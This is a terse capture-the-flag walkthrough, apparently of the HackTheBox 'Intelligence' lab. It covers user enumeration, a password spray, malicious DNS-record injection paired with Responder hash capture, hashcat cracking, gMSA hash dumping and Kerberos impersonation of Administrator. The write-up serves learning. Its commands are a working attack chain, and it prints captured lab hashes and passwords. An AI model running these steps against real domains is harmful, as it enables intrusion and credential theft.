53,80,135,139,445,636,3269,49692,49709
echo "10.129.95.154 intelligence.htb dc.intelligence.htb" >> /etc/hosts
run dir gobuster
The /documents page shows 403 forbidden, i tried bypassing ,but not work.
no subdomain found by gobuster.
smb anonymous
no interface found.
continue on 80 port.
found two pdf files.
translate:
Moreover, every one has his own way. It will never be achieved but achieved by hard work. Let him not seek any great thing. He wants more pain. Let the pain be with the pain, let it not be cut out of the ways. Because the pleasure of labor is the pain of pain. He likes the pain of the way he loves state They are looking for a great deal. He wants to make a great deal of money but gain gain Look for the times that are important and the times that are not. I do not have any further pain. He loves himself so much that he wants to ask. It's a lot of fun. Let him search for himself for a long time. La- Boredom is not followed by pain, but seeks ways to gain it. As his pain is the pain of any kind of pain. In a great way big It takes a lot of hard work to get them. Times will follow neither great manner nor great pain. It will never be great. Anyone who wants to be loved can be loved. I received no great pain He will follow him. As it is, some of his kind are hard at times. Not everyone there is no pain.
Painful as they fall, get some effort. Let him search with pain, and he will not care. I don't really want to go on like this. A great deal of pain, a great deal of gain, a great deal of pain. Some but his very pain is pleasure. Painful times are great times it is very The ways and means he will follow will never be his great will. It is pursued not by the will of the times, but by labor. He likes but the pleasure is with the work times. It will result in a great deal of pain, but it will be a pain in the ass. His pleasure is to be found. Gained, but the pain as they die, they do not die never Whatever the times may be pleasure. Never as a result of pain let anyone seek pain there. Times are painful and painful. I will continue to have a great time. It is a way to never feel pain or pain.
William.Lee Jose.Williams
kerbrute userenum --dc 10.129.95.154 username.txt -d intelligence.htb
found those two users exist
GetNPUsers.py intelligence.htb/ -usersfile username.txt -no-pass -request -dc-ip 10.129.95.154
pre-auth unset for those two users.
According to previous .pdf file, they are named by date and stored under /documents folder, so i wrote a python script to enumerate files under this folder.
import datetime import requests start_date = datetime.datetime(2020, 1, 1) end_date = datetime.datetime(2021, 7, 4) delta = datetime.timedelta(days=1) current_date = start_date while current_date <= end_date: url = current_date.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf") response = requests.get(url) if response.status_code == 200: print(url) current_date += delta
python3 enumeration.py >output
wget -i output
download all of them
convert all of them to text file
for i in *pdf; do pdftotext $i; done
Because the quantity is too large, i search sensitive words such as key,pass….
finally i found a file includes sensitive word ‘password’, and language is distinct from all other downloaded files.
grep -l "pass" *.txt 2020-06-04-upload.txt
┌─[✗]─[root@htb-veom2jynhn]─[/home/b3bop404/Desktop/pdf] └──╼ #cat 2020-06-04-upload.txt New Account Guide Welcome to Intelligence Corp! Please login using your username and the default password of: NewIntelligenceCorpUser9876 After logging in please change your password as soon as possible.
i get this credential
NewIntelligenceCorpUser9876
but i don’t have a valid username for this credential
in this domain, all users are likelly named as [firstname].[lastname] due to previous experience on kerbrute userenum. So i’d like to extract all author name from those pdf files.
exiftool *.pdf | grep Creator | tr -d ' ' | awk -F ':' '{print $2}' >> ../userlist
try
passwordspray attack
on [username]:’NewIntelligenceCorpUser9876’kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb userlist
all valid user, then moves on passwordspray
kerbrute passwordspray userlist NewIntelligenceCorpUser9876 --dc 10.129.95.154 -d intelligence.htb
not work
try smb enumeration
crackmapexec smb intelligence.htb -u userlist -p 'NewIntelligenceCorpUser9876'
found valid cred:
Tiffany.Molina:NewIntelligenceCorpUser9876
smbclient //10.129.95.154/Users -U intelligence.htb/Tiffany.Molina
Retrived the users flag from desktop
Â
smbclient //10.129.95.154/IT -U intelligence.htb/Tiffany.Molina
found a powershell file under IT interface
downdetector.ps1: Little-endian UTF-16 Unicode text, with CRLF, LF line terminators
here is content
# Check web server status. Scheduled to run every 5min Import-Module ActiveDirectory foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") { try { $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials if(.StatusCode -ne 200) { Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down" } } catch {} }
the script works constantly sending web requests to Active directory DNS record which start from web for checking status from the destination. Is there a way to trigger a spoofing on DNS and then get the detail info that send?
googling, i found dnstool.py .This tool can add/remove/modify Service Principal Names on accounts in AD over LDAP.
git clone https://github.com/dirkjanm/krbrelayx.git
python3 ./dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.129.95.154 -a add -r web111 -d 10.10.14.11 -t A
responder -I tun0
start listener..
wait for next round script execution.
Because i’m using htb pwnbox, 80 port is being occupied by python2.7. I switch back to my kali linux.
python3 ./dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.129.224.189 -a add -r web222 -d 10.10.16.13 -t A
[HTTP] NTLMv2 Client : 10.129.224.189 [HTTP] NTLMv2 Username : intelligence\Ted.Graves [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:b364c80df1ef91e1:DB28CD14E144EDF2CCE12B91B7536805:01010000000000001F3BA8685B6ADA014480D68E207B2B660000000002000800510056004700550001001E00570049004E002D003800530047003800430039004B0054005300490034000400140051005600470055002E004C004F00430041004C0003003400570049004E002D003800530047003800430039004B0054005300490034002E0051005600470055002E004C004F00430041004C000500140051005600470055002E004C004F00430041004C00080030003000000000000000000000000020000015F9094027228F59E49F80D2E2C49CDBECF32D90C142B7D3247E6A91C27355720A001000000000000000000000000000000000000900380048005400540050002F007700650062003200320032002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
received a hash from client , throw it into netcat
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
TedGraves:Mr.Teddy
evil-winrm -i intelligence.htb -u Ted.Graves -p 'Mr.Teddy'
failed
Try bloodhound
/bloodhound.py -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.129.128.237 -c All
gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb'
svc_int$:::d365e889367ce3e3241b120db1df6e25 svc_int$:aes256-cts-hmac-sha1-96:bdc4e5d502f64ffc7b7044c5a2ca5e41fe784866fcfa548b5b16dfdb73c30d63 svc_int$:aes128-cts-hmac-sha1-96:ce17e93d890939760b64a37bac296dd2
i tried crack, but it is not feasible
WWW/dc.intelligence.htb
getST.py -spn WWW/dc.intelligence.htb intelligence.htb/svc_int -hashes :d365e889367ce3e3241b120db1df6e25 -impersonate Administrator
export KRB5CCNAME=./Administrator.ccache
psexec.py -k -no-pass intelligence.htb/administrator@dc.intelligence.htb or wmiexec.py dc.intelligence.htb -k -no-pass
rooted!